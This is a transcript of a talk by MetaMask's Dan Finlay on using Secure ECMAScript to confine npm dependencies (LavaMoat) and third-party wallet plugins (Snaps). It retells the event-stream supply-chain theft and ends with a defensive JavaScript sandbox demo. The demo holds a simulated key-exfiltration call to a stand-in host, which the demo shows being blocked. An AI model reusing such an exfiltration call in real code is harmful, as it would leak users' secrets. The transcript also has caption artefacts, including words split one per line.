From YouTube: Dan Finlay from MetaMask presenting SES
Description
SES is a JavaScript runtime library for running such third-party code safely inside a featherweight compartment. SES stands for Secure ECMAScript, where ECMAScript is the standards name for JavaScript. SES addresses JavaScript’s lack of security. SES supports practicing of the Principle of Least Authority (or POLA) so that the risk from most third-party code can be substantially reduced.
Learn about Metamask: https://metamask.io/
Learn about SES: https://github.com/Agoric/SES/
I think I'm all set up. Okay, hey there, I'm Dan Finlay. I'm from MetaMask and I'm also building on Agoric's Secure ECMAScript work, and, you know, I've seen a lot of, you know, Mark comes to TC39 with a lot of proposals, and so I'm really happy to have some members from there here, because I'm hoping to bring a little practicality, like how it affects us every day, and we've got a pretty unique use case.
That puts us in a position of caring a lot about a couple of the features that this has. So, MetaMask. Just so I'll introduce myself: I'm a co-founder of MetaMask. I worked at Apple, I've been doing JavaScript for, like, seven years, I've been focusing largely on MetaMask's extensibility, but I'll be talking about two things.
You could write software that doesn't have anyone who could subvert it, so you could make a cooperative where the voting process is enforced, or you could make a new community currency, or, you know, our imaginations went wild, and we tried making an app and we realized that the fundamentals of logging into a web app are totally broken by blockchains, because on blockchains there is no registry of accounts.
There are no secrets, there's just your cryptographic keys that control your accounts, so we needed to make an account manager that was client-side, that was gonna store your secrets, and it was going to protect those secrets from all the hazards of the worlds you interacted in. In my version of JavaScript, there is no safe code, right? You're bringing your money. You've got people putting way too much money into this, right.
In JavaScript. And we've got over a million users and we've got a lot of application developers, and a lot of people started crowd sales and started funding projects, and there was a lot of excitement and enthusiasm, and really we saw things go wild in 2017, and, you know, things have been maturing a little bit. We've had a couple years of incubation. People are saying, okay, we know we can crowdfund really rapidly, but can we do it well? Can we do it carefully? Can we do it sanely?
So today, what we are is, basically, we're kind of the first dominant account manager for blockchain applications. So from a technical perspective, right now it's a web extension and a mobile browser. We provide key recovery and storage. We provide an API to websites; we add an API to the browser, and we let you just generate accounts like they were candy, so it's fully pseudonymous, and we have these payment APIs and you can interact with these new applications.
But there are a lot of unique challenges to this space, where we simultaneously have the highest security. We've got the security of a bank, but we've got just the usability of... no one's ever thought about this stuff before, and meanwhile the technology is so immature that we actually are constantly under pressure to innovate. So we're between a rock and a hard place. We need to innovate. We need to explore new protocols. You may hear a lot of people say blockchains don't scale, you know, will it ever take off, or maybe Facebook's just gonna...
...you know, squash it all, and we're always just gonna be, you know, yeah, so we're gonna use a lot of space bugs, yeah. So, but I mean, but can these things scale, and if we're gonna make them scale, we need to iterate and we need to innovate. So can we provide usability? Can we experiment with extensibility and still maintain that security, that reckless people are going to throw into our code?
So, in short, we've got a lot of features we want to add, but we have to preserve our security. So we actually have to... this inspired, when we learned about Agoric's work, it inspired two major projects within our organization. One is called LavaMoat and the other one we're calling Snaps. So first I'll talk about LavaMoat, and it has implications for the entire JavaScript ecosystem, I think.
It was just like, yeah, I wrote a log color formatter, and now I'm just reaping tons of credit cards, and, you know, I just steal from one out of 100 accounts, no one notices, and it's so plausible. And, you know, okay, but maybe it's sci-fi, we don't know, but then the next year a major Bitcoin wallet got hacked in the exact way described in that article. In this case, there was a very small module, just a stream transform, the event-stream transform, and the maintainer...
You know, he wrote it as an experiment. He said he's, you know, a code wizard, he was making all sorts of interesting modules, and millions and millions of people depend on his modules every day, and he wasn't maintaining this one anymore, and when some intrepid contributor said, "oh hey, I found some bugs, I'm enhancing the documentation," he gave them contributor rights. Why wouldn't he? Because this is a project he didn't care about anymore.
Well, what that contributor knew is that this little tiny stream module was being used in the BitPay Bitcoin wallet, and so they were able to undermine the build process of that Bitcoin wallet. So it didn't even look like there was a problem, but when you built it, now it injected a thing, so that now, when their keys go through a stream, it sends them up to their home base, and they stole, I think it was around twelve million dollars, that way.
So, you know, we're a JavaScript wallet. What do we do about that? So we've got LavaMoat; ignore this ID and decide thing on the side for a sec. It is a JavaScript build transform. So first it's Browserify, it's gonna be Webpack; it's actually very trivial to work between different build processes, and it puts every single dependency into a SES container, the same thing you saw running around that light bulb.
We put every dependency in it, like we just don't trust it at all, so they get no global API. They get no permissions by default, and all of those permissions that they do get are constrained by a config file that we generate the first time we install it. So here's a hypothetical stream-http. You know, we've got plenty of stream transform modules in our dependency graph. In this case it uses a number of globals, and you can see it actually does use XMLHttpRequest, which is one of those, and fetch.
So we watch those ones real close. So this would be a sensitive module that we might audit more closely. But if the module is just transforming a stream, we would give it none of those things. It may be a pure function, input and output, and we now can trust much more safely that that dependency isn't the thing that's going to be stealing our keys, as long as we're running this transform, we're not running scripts at install time in our build process, and at run time.
...that says, "oh, suddenly event-stream wants network access," and we scratch our heads and we might read the source code and say, like, what is that very long obfuscated line? And so it's a cool static analysis tool as well as a sandboxing tool, or confinement tool, and yeah. So we get that visible diff.
We can't guarantee that those aren't going to call home, but now we've limited the critical attack surface to these select modules, and so now we can investigate those, and, you know, for any one of them now, a green module, if they would want to hack us, they'd have to both subvert the dependency tree and have a zero-day on the SES containment.
[Audience remark]

If you can't tell, that is a big graph, and this is, yeah, it's a lot of dependencies, but welcome to JavaScript. Okay, yeah, I mean, you may trust your origin, but that's probably because you're not using npm, all right. And now here's our same dependency graph running not under SES. If we don't have Secure ECMAScript, if we don't have that containment, any single one of these modules could pollute our Array prototype, it could, you know, call home, and there's just a million ways that they could just steal everything. So we just massively reduced that.
Okay, that's one of the ways that we found it useful too. So that was the security one, and a lot of people don't get inspired by the security story. They say, "no, no, we really can secure our code," and that's fine. If that's for you, so be it, but there's another very interesting story we've found using Secure ECMAScript, because we also are constantly being pressed to innovate. Cryptocurrency is moving incredibly fast.
We are an Ethereum-first wallet, but there's like 100 blockchains right now, and there's, you know, a thousand scaling strategies, and every single one of them comes to our repo and they say, "accept our pull request, integrate us, give us first-class status, you know, show all your users," and it's a lot of pressure, and we have to audit this code, and we have to say... and now we feel like we're picking winners. We can't read all the white papers. How do we?
How do we keep ourselves relevant in a space where we're trying to facilitate creativity that is just booming, right? This is it. People are saying this has the potential to rewrite the rules of finance and how society works, and if that's the case, then, well, yeah, then all that funding is justified. But how do those people get in the door today? Each one of them has to write a whole wallet from scratch, and so our users, they could come to us.
They want new networks, new features, scaling strategies, contract accounts, new hosting services, hardware wallets, cryptography, etcetera, like I was saying, and we just can't merge enough. So what do we do? We start constraining contributions, so we've written a little bit of a permissions system. So we added to the API that we provide to sites, we gave a way of requesting permission from our wallet, but the most interesting permission we added was the permission to run a script which itself gets permissions.
So this means we get to have a nice pretty little prompt when somebody's logging in with our system, and they, yeah. So we already get permissions, and now we have the ability to get user consent to further delegate those permissions. So, you know, we're confined as a web extension, but now we can further confine things that we want, so through delegation, and yeah. We can then extend for it, and we can now extend APIs that are very specific to what a new cryptocurrency wallet means.
So we're pretty sure that a new cryptocurrency actually only needs a couple things from us. We've done all the groundwork, right. We've got the user backing up keys, we've added in an API to the website. They basically need... actually, the next slide shows it. About a month ago we did a hackathon with Agoric. They mentioned they're doing a blockchain, and as our hackathon project, we used this plug-in system to, at runtime, sign in to a site where we added their blockchain support as part of the login flow.
So we believe this is the first time that someone added blockchain support to a wallet at runtime, so it's very similar to our normal login. Basically, they're like, when you're logging in... We think we can make this one permission request, but basically they want to know if you can install the script, and then the script wants, and this is the important part, it's got two little permissions. It's asking for permission to display confirmations for user action and to display custom assets in your wallet, and so those are the two.
When we talk about attenuating, what are the functions you're passing to this untrusted script, to give us support for another blockchain? There would also be network support there. A new blockchain, interacting with your wallet, with your browser, basically needs network access. They just want to list an asset and they want to ask user consent.
So those three things, now we make three functions for that. We've very greatly confined it, and now we have a scalable, kind of permissionless blockchain playground, and our developer community is seriously going nuts about it, because previously every new blockchain needed to write their own new wallet, their own new account manager, all this stuff. Suddenly they just have to write a little script that just describes how to interact with it, and now they can go wild.
They can build applications, so we're seeing people starting to build new networks and scalability. There's, you can write smart contract accounts, which means, like, you don't have to ask somebody else; it's a two-factor, or to authenticate you can, like, have a social network recovery, or we saw smart wills. There's some cool things like that, new kinds of privacy, we're, yeah, end-to-end encryption in the browser, yeah, new security enhancements, blah blah, yeah.
We
have
a
lot
of
enthusiasm.
Our
developers
have
been
like
rebirth
with
excitement.
This
is
like
a
part
of
our
platform
that
was
closed
before
blocked
by
PRS.
If
you
know
what
it's
like,
maintaining
a
very
contentious
github
repository,
then
you
might
be
able
to
appreciate
what
it's
like
when
you
can't.
Finally
tell
people
like.
A
Actually,
if
you
can
get
users
to
consent
to
a
couple
simple
permissions
like
it's:
it's
their
web
now
like
they
can
literally
add
API
to
the
browser
at
runtime
with
this.
So
it's
like
got
implications
a
little
bit
beyond
cryptocurrency
too
so
I'll
just
end
with
a
Mark
Miller
quote.
You know, it's been driving his work for a long time now: if you reduce the risk of cooperation, you get a more cooperative world. This is all about software getting fun again, right, fun, but without losing the gravity of what we're working with. So, you know, we don't know that any of this is perfect, you know, but we'd like it to be. We understand the principles that make this exciting to us, and that's why we are here at TC39, basically saying, like, facilitate standards that make it safer to secure and isolate JavaScript. And a lot of times it does mean I kind of listen to, you know, I'm not saying unquestioningly, but if you understand these principles, you understand a lot of the kind of guiding, you know, thrust.
[Audience question]

How big is our developer community? We lost track a long time ago. You know, in 2017 I could tell you how many developers there are. I think weekly actives, which are honestly mostly developers, it's around 45,000, so maybe we'll say like 20,000, but yeah. And yeah, we've seen a lot of renewed interest. You know, people got kind of... it was feeling a little bit stuck. You know, because people knew Ethereum wasn't scaling yet, you know, we're waiting for Ethereum to, but when we suddenly say, well, how about all of those alternative token protocols and all those other ideas you had, when we give them away, and so, yeah, I think this is gonna be an exciting year for them, and hopefully others, yeah.
Yes, so that's: how do we figure out, during the LavaMoat build process, how do we know what APIs are used by each package? So it is a static analysis, right. So it's obviously not perfect, but here's the good news: because we're only permitting access to things that we explicitly list in that config, if some module was being sneaky and obfuscating the things it was using, it would fail by not gaining access to that thing. So that config file, yeah, it restricts and only allows access to the things explicitly listed, and so we make our best guess. So far it's been good; we've gotten most of our dependencies in it. You know, it's in progress right now, but yeah, yep, good, yeah.
No, right now, are we using the XS engine, or are we using V8 or something? Right now both of those are in beta, so neither of those are in production right now, and so we are using the Realms shim, and, you know, there were vulnerabilities found in the last few months, right. So we know that a JavaScript-based containment is not the perfect solution. That's why it's critical that this gets adopted by the runtimes themselves, because it can't be like a native enforcement of these policies.
[Audience question]

Right, so, right, this is a way of experimenting with what could be, and it is JavaScript, and if we do it right, it'll be secure, and it's so much more fun to play in a secure language where you can just, like, link your code together and have very, very explicit guarantees about what the other can do. It makes the cooperation much cheaper. Yep, any other? Yeah, yeah, pretty simple. Thanks.
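The LavaMoat idea described in the talk and in the Q&A answer about the generated config, as an added example that is not LavaMoat's or SES's own code: each dependency runs with only the globals its policy entry lists, so an unlisted global such as `fetch` is simply absent and a module that secretly tries to call home fails. The policy entries, the `stream-http` and `event-stream` names and the stand-in host globals are constructed for this example; real LavaMoat uses SES Compartments, whereas this sketch shadows globals with function parameters and does not hide `globalThis`.

```javascript
"use strict";

// Constructed policy, in the spirit of LavaMoat's generated config:
// module name -> the globals it is allowed to see. (Example data only.)
const policy = {
  "stream-http": { globals: ["XMLHttpRequest", "fetch"] },
  "event-stream": { globals: [] }, // a pure stream transform gets nothing
};

// Constructed stand-ins for the host globals so the example runs offline.
const hostGlobals = {
  fetch: async (url) => ({ ok: true, url }),
  XMLHttpRequest: function XMLHttpRequest() {},
};

// Build the endowments for one module: only globals listed in its policy
// entry are copied in; everything else is left out entirely.
function endowmentsFor(moduleName) {
  const entry = policy[moduleName] || { globals: [] };
  const endowments = Object.create(null);
  for (const name of entry.globals) {
    if (Object.prototype.hasOwnProperty.call(hostGlobals, name)) {
      endowments[name] = hostGlobals[name];
    }
  }
  return Object.freeze(endowments);
}

// Run a CommonJS-style module body with its endowments. Every host global
// name becomes a parameter bound to the endowment or to undefined, so
// unlisted names are shadowed. `new Function` stands in for a SES
// Compartment here; unlike SES it does not remove access to `globalThis`.
function runConfined(moduleName, source) {
  const endowments = endowmentsFor(moduleName);
  const names = Object.keys(hostGlobals);
  const body = new Function(...names, "module", source);
  const module = { exports: {} };
  body(...names.map((n) => endowments[n]), module);
  return module.exports;
}

// Demo: a pure transform works, a module with network permission sees fetch,
// and a transform that tries to exfiltrate keys fails with a TypeError.
function demo() {
  const upper = runConfined("event-stream", "module.exports = (s) => s.toUpperCase();");
  const http = runConfined("stream-http", "module.exports = () => typeof fetch;");
  const sneaky = runConfined("event-stream",
    'module.exports = (keys) => fetch("https://example.invalid/?k=" + keys);');
  let exfilBlocked = false;
  try { sneaky("secret"); } catch (e) { exfilBlocked = e instanceof TypeError; }
  return { upper: upper("abc"), httpSeesFetch: http(), exfilBlocked };
}
```

Running `demo()` gives `{ upper: "ABC", httpSeesFetch: "function", exfilBlocked: true }`; the policy-driven diff the talk describes is the change that appears when a module's entry suddenly needs `fetch` added.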